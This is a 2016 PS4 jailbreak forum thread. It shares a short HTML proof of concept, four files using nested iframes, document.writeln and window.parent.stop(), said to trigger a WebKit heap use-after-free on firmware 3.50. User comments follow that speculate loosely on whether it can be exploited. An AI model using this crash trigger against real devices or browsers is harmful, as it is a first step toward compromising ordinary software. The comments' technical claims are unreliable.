Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 Jailbreaking       Thread starter PSXHAX       Start date May 21, 2016 at 3:38 PM       49      
Status
Not open for further replies.
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.

Anywho make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
       document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause a out of memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
PS4 Heap Use-After-Free At WebCore 3.50 PoC.jpg

Comments

@Chaos Kid i dont care about dongle or re drm ode makers...

Its about what ODE means. A user has asked and i give him a simple answer...
I don't either at the end of the day cuz most don't know what it is all you need is the newest xlc/c++ for the latest ps4 development and the rest is taken care of aslong as you make the matching makefile

Hi I am new here but i have been following the PS4 progress for some time now.

It has become pretty quiet regarding a 3.50 Exploit. So is this PoC not exploitable or are people working quietly? What do you guys think about it?

Hi I am new here but i have been following the PS4 progress for some time now.

It has become pretty quiet regarding a 3.50 Exploit. So is this PoC not exploitable or are people working quietly? What do you guys think about it?
You have a better chance with bdlive then using this concept tbh but that's just my opinion.

I've made my share of statements and available the rest is what ppl chose to do

so @Chaos Kid , you don't think with qwertyuiopz and CTurtE working together on this they will be able to pull something off?
I never said that they are using fw 1.76 with webkit using ofw directly to obtain a fully installed linux without bent tools or using vm linux will result in aligned data but that's just me. You can obtain data a # of ways debugging or keys n whatever but depends on the dev.

Question is has any1 thot about using game over tftp? N debug?

Status
Not open for further replies.
Back